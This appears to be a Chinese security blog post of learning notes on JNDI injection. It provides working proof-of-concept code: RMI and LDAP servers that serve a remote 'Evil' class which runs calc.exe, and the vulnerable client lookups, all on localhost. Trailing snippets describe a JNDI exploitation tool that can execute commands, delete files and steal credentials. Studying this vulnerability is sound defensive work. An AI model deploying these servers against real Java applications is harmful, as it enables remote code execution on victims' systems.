JNDI注入学习

最新推荐文章于 2024-04-11 20:17:01 发布
最新推荐文章于 2024-04-11 20:17:01 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: java安全 代码审计 文章标签: 安全 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121735066
版权

JNDI注入

简单记录一下学习JNDI时学习到的知识点

JNDI是什么?

前面我们学习过RMI远程方法调用,那是一个RMI SERVER - RMI Client的结构,而 JNDI 也可以从RMI SERVER中获取到对象并执行其中的方法。那么这两者有什么区别呢?

RMI SERVER - RMI Client 结构,方法最终是在RMI SERVER端中执行的

RMI SERVER - JNDI 结构,方法最终是在JNDI客户端执行的

在RMI SERVER - JNDI 结构中,RMI SERVER不只可以绑定本地的对象,还可以通过References类来绑定一个外部对象(这个外部对象的意思是可以通过url进行访问到的,这个url可以指向本地,也可以指向非本地)

JNDI利用RMI执行系统命令

当RMI SERVER - JNDI 结构中的RMI SERVER绑定的是一个外部对象,这时当JNDI通过lookup一个对象时,RMI SERVER返回的是一个ReferenceWrapper_Stub,然后通过ReferenceWrapper_Stub获得一个Reference对象(如下图),然后根据这个对象里的className属性在本地的className指定路径查找有没有Reference对象对应的类,有则直接拿本地的,没有则从classFactoryLocation属性指定的URL中去加载
image-20211205200230978
图片中的Reference对象对应下面代码中的Reference对象,从这里可以知道classFactory、className、factoryLocation属性都是我们可以控制的,那么我们就可以控制JNDI客户端在从哪里加载恶意类了

漏洞演示代码如下(复现时JDK版本为jdk7u80)

RMI Server

package com.vul.JNDI;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(8999);
        Reference reference = new Reference("1","Evil","http://127.0.0.1:9999/");
        ReferenceWrapper ref = new ReferenceWrapper(reference);
        registry.bind("payload",ref);
    }
}

Evil恶意类(不要和RMI Server放在同一个包下,否则不用开启web服务也能找到这个类)

public class Evil {
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc.exe");
    }
}

JNDI客户端

package com.vul.JNDI;

import javax.naming.InitialContext;

public class Client {
    public static void main(String[] args) throws Exception{
        InitialContext initial = new InitialContext();
        initial.lookup("rmi://127.0.0.1:8999/payload");
    }
}

先开启RMI Server,后把Evil进行编译,再在Evil恶意类目录下用python -m http.server 9999开启一个简单的web服务,监听端口为9999,此时访问http://127.0.0.1:9999/Evil.class就能访问到Evil恶意类,最后启动JNDI客户端就能在JNDI客户端的电脑上弹出计算机

注意点

  1. 第一个就是前面说到的Evil恶意类不要和RMI Server放在同一个包下,甚至是同一个项目
  2. 第二个就是Evil恶意类不能有包名,也就是不能有package xxx,因为有包名的话在通过javac编译java文件时会在方法名也加上包名,这时候会导致不匹配

为什么能在JNDI客户端执行命令?

前面只是说到了能控制JNDI客户端从哪里加载 类,但是为什么会执行命令呢?其实在InitialContext.lookup方法下个断点调试就不难发现在加载类的时候是通过Class.forName加载类的,且第二个参数为true,这时候就会执行恶意类的静态代码块。加载类之后再通过(ObjectFactory) clas.newInstance()实例化类,这时候就会执行恶意类的构造方法。在实例化之后把类转换为ObjectFactory,之后再调用factory.getObjectInstance方法,factory就是实例化的对象,所以恶意类中的getObjectInstance方法的代码也会被执行,但是前提条件是实例化出来的对象能成功转换为ObjectFactory,那么就需要恶意类 实现 ObjectFactory接口。

所以,构造的恶意类可以在三个地方写入命令执行代码

  1. 在构造方法中写入恶意代码
  2. 在静态代码块中写入恶意代码
  3. 在getObjectInstance方法中写入恶意代码,这时候需要恶意类 实现 ObjectFactory接口

JNDI利用RMI的局限性

JNDI利用RMI存在版本局限,下面贴一张啦啦0咯咯师傅的图
image-20211205202714430
JNDI不只是可以调用RMI服务,还可以调用LDAP服务,且没有那么多的版本局限!

JNDI利用LDAP

需要先引入一个依赖

<dependency>
    <groupId>com.unboundid</groupId>
    <artifactId>unboundid-ldapsdk</artifactId>
    <version>6.0.0</version>
</dependency>

直接上漏洞演示代码(复现时JDK版本为jdk7u15)

LdapServer

package org.vul;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;

public class LdapServer {
    private static final String LDAP_BASE = "dc=example,dc=com";


    public static void main (String[] args) {

        String url = "http://127.0.0.1:9999/#Evil";
        int port = 8999;


        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url)));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();

        }
        catch ( Exception e ) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;


        /**
         *
         */
        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }


        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }

        }


        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "Exploit");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if ( refPos > 0 ) {
                cbstring = cbstring.substring(0, refPos);
            }
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference");
            e.addAttribute("javaFactory", this.codebase.getRef());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }
}

Evil恶意类

public class Evil{
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc.exe");
    }
}

JNDI客户端

package org.vul;

import javax.naming.InitialContext;

public class Client {
    public static void main(String[] args) throws Exception{
        InitialContext initial = new InitialContext();
        initial.lookup("ldap://127.0.0.1:8999/payload");
    }
}

JNDI利用LDAP的局限性

JNDI利用LDAP存在版本局限,下面贴一张啦啦0咯咯师傅的图

image-20211205203839991

总结

本文只是简单叙述了学习JNDI过程中遇到的一些注意点,学习的话还是参考下面链接吧,文章可能存在理解上的偏差,若有错误,还请指正

https://xz.aliyun.com/t/6633
https://kingx.me/Exploit-Java-Deserialization-with-RMI.html
https://ego00.blog.csdn.net/article/details/120048519

0x6b79
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
【漏洞】log4j2远程执行代码复现实操代码例子
肉段_Dxd的博客
12-11 4300
关于近日log4j漏洞导致的远程执行代码的复现例子,利用JNDI的ldap攻击,使远程服务可能执行了恶意代码
JNDI注入原理及利用IDEA漏洞复现_jndi注入 rce
最新发布
2401_83944596的博客
04-11 735
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
JNDI注入详解
m0_60571990的博客
03-02 3664
JNDI注入详解
[Java安全]—JNDI注入
Sentiment的博客
07-08 2608
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
JNDI注入学习(看不懂直接喷,别忍着!)
一剑开天门!的博客
01-13 2647
JNDI注入学习(看不懂直接喷,别忍着!)
JNDI注入学习1
08-03
JNDI 注简单来说就是在 JNDI 接在初始化时,如: InitialContext.lookup(URI) ,如果URI 可控,那么客户端就可能会被攻击通过
EJB学习笔记.doc
05-14
* 第 7 章:给 EJB 增加功能(Bean 的调用、公用的标注、依赖注入、拦截器) * 第 8 章:实体高级部分 * 第 9 章:事务 * 第 10 章:EJB 安全 * 第 11 章:定时服务(任务管理) 五、EJB 相关技术 * JNDI...
完整的Java代码审计学习笔记资源(免费下载)
10-31
.gitignore 第一的 4年前 自述文件.md 添加一些关于 jndi 的内容 3年前 java代码审计-sqli.md 第一的 4年前 java代码审计-ssrf.md ...添加一些关于 jndi 的内容 ...java代码审计-表达式注入.md 第一的
JAVA上百实例源码以及开源项目源代码
09-17
1个目标文件,JNDI的使用例子,有源代码,可以下载参考,JNDI的使用,初始化Context,它是连接JNDI树的起始点,查找你要的对象,打印找到的对象,关闭Context…… ftp文件传输 2个目标文件,FTP的目标是:(1)提高...
spring in action英文版
08-26
 4.1 学习Spring的DAO理念  4.1.1 理解Spring的DataAccessException  4.1.2 与DataSource一起工作  4.1.3 一致的DAO支持  4.2 在Spring使用JDBC  4.2.1 JDBC代码的问题  4.2.2 使用...
JNDI注入
Christ1na的博客
11-17 748
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5419
JDNI注入总结
JNDI注入详解(自学)
m0_64481831的博客
03-03 1149
Jndi叫Java命名和目录的接口,可以类比为一个字典(就比如用一个目录路径去定义一个文件,目录路径和文件就是键值)。在Java应用除了以常规方式使用名称服务(比如使用DNS解析域名) ,另一个常见的用法是使用目录服务作为对象存储的系统来存储和获取Java对象(比如使用打印机,在目录服务查找打印机然后获得一个打印机对象)。Jndi包含在Java SE平台。要使用Jndi,您必须拥有Jndi类和一个或多个服务提供者(SPI)。JDK包含以下命名/目录服务的服务提供者:轻量级目录访问协议(LDAP。
JNDI注入+高版本绕过+工具使用
GalaxySpaceX的博客
06-21 2307
JNDI注入+高版本绕过+工具使用
【Java代码审计】JNDI注入
大河之犬的博客
03-07 1279
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDI 是 Java EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9367
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
HTTP 无法注册 URL http://127.0.0.1:9999/calculatorservice/metadata。进程不具有此命名空间的访问权限
热门推荐
jazywoo_在路上
06-17 3万+
开始学习WCF程序,运行的时候却发现出如下问题: HTTP 无法注册 URLhttp://127.0.0.1:9999/calculatorservice/metadata。进程不具有此命名空间的访问权限(有关详细信息,请参见 http://go.microsoft.com/fwlink/?LinkId=70353)。 按照例子一开始就遇到这样的问题,后来从网上看到,原因可能是Win
【java安全JNDI注入概述
leekos的博客,分享web安全相关知识~
08-24 1254
是Java提供的Java命名和目录接口。通过调用JNDI的API可以定位资源和其他程序对象。命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
weblogic jndi注入漏洞利用
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值